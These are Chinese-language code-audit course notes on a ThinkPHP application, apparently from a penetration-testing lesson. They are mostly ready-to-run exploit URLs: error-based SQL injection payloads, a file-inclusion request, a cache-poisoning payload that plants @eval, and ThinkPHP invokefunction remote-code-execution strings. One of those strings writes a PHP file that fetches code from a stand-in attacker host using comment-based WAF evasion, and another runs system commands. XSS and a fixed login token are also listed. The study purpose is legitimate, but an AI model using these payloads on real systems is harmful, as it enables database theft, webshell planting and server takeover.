DAY113代码审计-PHPTP框架微P系统漏审项目等
一、环境安装
导入数据
Debug
版本信息收集
一、不安全写法的sql注入(拼接写法绕过预编译机制)
1、Good.php的不安全写法
2、查找可以参数
3、找路由关系
application/index/controller/Goods.php
http://172.19.1.236:8833/index.php/index/goods/ajaxkdata/pid/6 and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%23
application/common.php
二、版本漏洞
1、5.x全版本的sql漏洞
http://172.19.1.236:8833/index.php/index/xiaodi/test?username=) union select updatexml(1,concat(0x7,user(),0x7e),1)%23
产品未找到该用法
2、文件包含
渲染页面值
http://172.19.1.236:8833/index.php/index/xiaodi/include_test?cacheFile=1.html
页面渲染
3、缓存漏洞
http://172.19.1.236:8833/index.php/index/xiaodi/index?username=mochazz123%0d%0a@eval($_GET[_]);//*
4、命令执行
waf对eval进行了拦截
禁止了assert函数对eval函数后面的括号进行了正则过滤
对file\_get\_contents函数后面的括号进行了正则过滤
http://www.0-sec.org/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
5、xss漏洞
用户名存在xss
6、验证登录token值固定